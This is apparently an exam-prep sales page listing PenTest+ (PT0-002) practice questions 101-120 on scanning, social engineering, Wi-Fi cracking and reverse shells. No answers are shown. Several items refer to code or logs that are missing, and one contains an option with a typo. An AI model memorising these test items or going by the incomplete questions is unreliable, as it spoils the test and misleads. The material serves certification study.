B.

Phishing

C.

Shoulder surfing

D.

Tailgating

Buy Now
Questions 101

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

Options:

A.

Nmap

B.

Nikto

C.

Cain and Abel

D.

Ethercap

Buy Now
Questions 102

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

Options:

A.

Spawn a local shell.

B.

Disable NIC.

C.

List processes.

D.

Change the MAC address

Buy Now
Questions 103

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

Options:

A.

Netcraft

B.

CentralOps

C.

Responder

D.

FOCA

Buy Now
Questions 104

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Options:

A.

Peach

B.

WinDbg

C.

GDB

D.

OllyDbg

Buy Now
Questions 105

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

Options:

A.

Setting up a secret management solution for all items in the source code management system

B.

Implementing role-based access control on the source code management system

C.

Configuring multifactor authentication on the source code management system

D.

Leveraging a solution to scan for other similar instances in the source code management system

E.

Developing a secure software development life cycle process for committing code to the source code management system

F.

Creating a trigger that will prevent developers from including passwords in the source code management system

Buy Now
Questions 106

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?

Options:

A.

The timing of the scan

B.

The bandwidth limitations

C.

The inventory of assets and versions

D.

The type of scan

Buy Now
Questions 107

ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?

Options:

A.

Dropping USB flash drives around the company campus with the file on it

B.

Attaching the file in a phishing SMS that warns users to execute the file or they will be locked out of their accounts

C.

Sending a pretext email from the IT department before sending the download instructions later

D.

Saving the file in a common folder with a name that encourages people to click it

Buy Now
Questions 108

A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

Options:

A.

Send an SMS with a spoofed service number including a link to download a malicious application.

B.

Exploit a vulnerability in the MDM and create a new account and device profile.

C.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

D.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

Buy Now
Questions 109

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error?

Options:

A.

TCP port 443 is not open on the firewall

B.

The API server is using SSL instead of TLS

C.

The tester is using an outdated version of the application

D.

The application has the API certificate pinned.

Buy Now
Questions 110

Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?

Options:

A.

Scope details

B.

Findings

C.

Methodology

D.

Statement of work

Buy Now
Questions 111

Which of the following documents describes activities that are prohibited during a scheduled penetration test?

Options:

A.

MSA

B.

NDA

C.

ROE

D.

SLA

Buy Now
Questions 112

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

Options:

A.

Wireshark

B.

EAPHammer

C.

Kismet

D.

Aircrack-ng

Buy Now
Questions 113

A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?

Options:

A.

-а8 -T0

B.

--script "http*vuln*"

C.

-sn

D.

-O -A

Buy Now
Questions 114

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

Options:

A.

The injection was too slow.

B.

The DNS information was incorrect.

C.

The DNS cache was not refreshed.

D.

The client did not receive a trusted response.

Buy Now
Questions 115

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

Options:

A.

Network segmentation

B.

Key rotation

C.

Encrypted passwords

D.

Patch management

Buy Now
Questions 116

Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Options:

A.

Executive summary

B.

Attack TTPs

C.

Methodology

D.

Scope details

Buy Now
Questions 117

A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:

Which of the following should the penetration tester do NEXT?

Options:

A.

Close the reverse shell the tester is using.

B.

Note this finding for inclusion in the final report.

C.

Investigate the high numbered port connections.

D.

Contact the client immediately.

Buy Now
Questions 118

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

Options:

A.

A list

B.

A tree

C.

A dictionary

D.

An array

Buy Now
Questions 119

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

Options:

A.

Run an application vulnerability scan and then identify the TCP ports used by the application.

B.

Run the application attached to a debugger and then review the application's log.

C.

Disassemble the binary code and then identify the break points.

D.

Start a packet capture with Wireshark and then run the application.

Buy Now
Questions 120

A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

Options:

A.

Redirecting output from a file to a remote system

B.

Building a scheduled task for execution

C.

Mapping a share to a remote system

D.

Executing a file on the remote system

E.

Creating a new process on all domain systems

F.

Setting up a reverse shell from a remote system

G.

Adding an additional IP address on the compromised system

Buy Now
Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Last Update: May 23, 2024
Questions: 400
PT0-002 pdf

PT0-002 PDF

$28  $80
PT0-002 Engine

PT0-002 Testing Engine

$33.25  $95
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$45.5  $130